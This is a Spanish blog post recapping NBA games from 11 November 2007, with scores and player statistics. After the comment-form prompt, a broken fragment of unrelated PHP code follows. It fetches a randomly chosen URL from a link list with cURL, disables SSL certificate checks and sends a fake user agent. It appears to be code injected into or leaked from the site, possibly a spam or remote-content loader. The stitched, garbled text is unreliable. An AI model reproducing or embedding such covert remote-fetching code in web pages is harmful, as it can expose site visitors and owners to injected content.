La crónica (11/11/07)

12 de November de 2007 por txusma

Washington Wizards y Miami Heat estrenaron su casillero de victorias en una jornada sin grandes sorpresas ni grandes actuaciones individuales. Rockets y Spurs, con diferente grado de esfuerzo y diferente estilo de juego, ganaron sus respectivos encuentros y siguen comandando la Conferencia Oeste.

Sin más dilación, la crónica.

Wizards 101 – Hawks 90

Caron Butler, con 24 puntos y 8 asistencias, y Antawn Jamison, con 23 puntos y 15 rebotes, lideraron a unos Wizards que rompieron una racha de 5 partidos consecutivos perdiendo y evitaron lo que habría sido el peor inicio en la historia de la franquicia. Con Gilbert Arenas a medio gas por culpa de su lesión de rodilla, los dos jugadores comandaron a un equipo en el que todos respondieron (todos los titulares anotaron 10 o más puntos). Atlanta continua con sus problemas de concentración y de cierta pasividad. Destacaron Josh Smith, con 22 puntos pero sólo 4 rebotes, Joe Johnson (con 22) y, sobre todo, Marvin Williams, que partido a partido comienza a argumentar ese número 2 del draft. Destacó también Al Horford, del que el entrenador de los Hawks, Mike Woodson, declaró que continuará siendo el center titular del equipo a pesar de la recuperación de Zaza Pachulia.

Heat 75 – Knicks 72

Jason Williams se convirtió en el héroe del partido al anotar una canasta a falta de 19 segundos que finalmente dio la primera victoria de la temporada a los de Miami. De esta manera los Heats obtuvieron la primera alegría desde el 13 de abril, fecha de su último triunfo. Con Dwyane Wade aún fuera del equipo por lesión y la ausencia de Zach Randolph por asuntos personales, los 2 equipos quedaron huérfanos de sus principales estrellas, hecho que provocó momentos de profunda ineptitud ofensiva en ambas canastas. En los dos últimos minutos los Heat remontaron una diferencia de 5 puntos gracias a Udonis Haslem y Jason Williams y amarraron la victoria. Por parte de los Knicks sólo destacó Eddie Curry y, una vez más, David Lee, que con 14 rebotes fue el máximo reboteador de su equipo.

Hornets 93 – Sixers 72

Un gran juego en equipo permitió a los Hornets romper una miniracha de dos partidos seguidos perdidos y recordar al equipo que ganó los 4 primeros partidos de la temporada. Los de New Orleans se escaparon rápidamente en el marcador y no dieron a los Sixers ninguna posibilidad de acercarse. De esta manera ninguno de sus titulares jugó más de 30 minutos y pudieron descansar de cara al partido contra New Jersey, esta misma noche. Los Sixers, con un 2 de 15 en triples, no fueron rivales y, a pesar de tener un calendario a priori sencillo, se colocan con 2-4, lejos de su objetivo de conseguir victorias y ganar confianza. Los más destacados del partidos fueron Chris Paul, con 16 puntos y 9 asistencias, por parte de New Orleans, y Samuel Dalembert, con 15 puntos y 10 rebotes, por parte de Philadelphia.

Rockets 85 – Bobcats 82

Entre Yao Ming y McGrady sumaron 60 puntos. Parece un titular destacado, pero se vuelve impresionante cuando adviertes que esa suma es el 70,5% de los tantos de su equipo. Y mucho más porque eso bastó a los Rockets para llevarse la victoria de la cancha de los Bobcats. Yao lideró a su equipo con 34 puntos y un par de tiros libres a falta de 20 segundos que pusieron a su equipo por delante en el marcador. McGrady por su parte consiguió 12 de sus 26 puntos en el último periodo. El trabajo bajo los aros lo dejaron en manos de Shane Battier, que contribuyó a la tercera victoria consecutiva su equipo con 10 rebotes. Por parte de Charlotte, Felton bajó ligeramente sus prestaciones al conseguir 16 puntos y tan sólo 4 asistencias, lo que dificultó mucho la labor de sus compañeros, en especial la de Gerald Wallace, que se quedó solamente en 10 puntos.

 

Bucks 88 – Spurs 113

El año pasado sólo 2 equipos fueron capaces de ganar todos sus partidos contra los Spurs durante la Regular Season. Uno fueron los Cavaliers de Lebron James y el otro, los Milwaukee Bucks. Ante esta situación, San Antonio salió a jugar más motivado que nunca y llegó a dominar el partido por 40 puntos de diferencia. Los Bucks fueron arrollados por un tren comandado Manu Ginobili (21 puntos en 18 minutos) y Tim Duncan (16 puntos y 10 rebotes), pero en el que muchos jugadores aportaron por encima de sus números habituales. En los Bucks destacó Maurice Williams (17 puntos y 6 asistencias) y el rookie Yi Jianlian que, partido a partido, sigue demostrando un gran calidad.

Pistons 107 – Sonics 103

Los Pistons tiraron de experiencia para dejar a los Sonics con el peor inicio de temporada de toda su historia (0-7). Después de un primer cuarto magistral, donde obtuvieron un 64% en tiros de campo, ya se escaparon por 15 puntos y supieron administrar su ventaja hasta el final del partido, donde nuevamente el oficio de los de Detroit fue fundamental. Hamilton cuajó un gran partido con 34 puntos, secundado por un rejuvenecido Antonio McDyess, con 15 puntos y 15 rebotes. Seattle no jugó un mal partido, pero falló en momentos puntuales. Los 2 rookies, Kevin Durant y Jeff Green, fueron sus jugadores más destacados con 19 y 17 puntos respectivamente.

Cavs 103 – Clippers 95

Si a la baja de Elton Brand le sumamos la de Cuttino Mobley es bastante probable que ni siquiera un buen día de Cassell y Maggette puedan hacer que ganes. Si a eso le añadimos que LeBron e Ilgauskas hicieron un gran trabajo yéndose a 22 puntos y 8 asistencias uno y a 25 puntos el otro, es bastante menos probable. Y si encima Drew Gooden captura 17 rebotes se hace prácticamente imposible. Los Clippers cosecharon su segunda derrota consecutiva en un partido que pudieron ganar al ponerse 75-72 a falta de un cuarto, tras remontar en el tercero. Pero la falta de acierto en los minutos finales fue definitiva.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>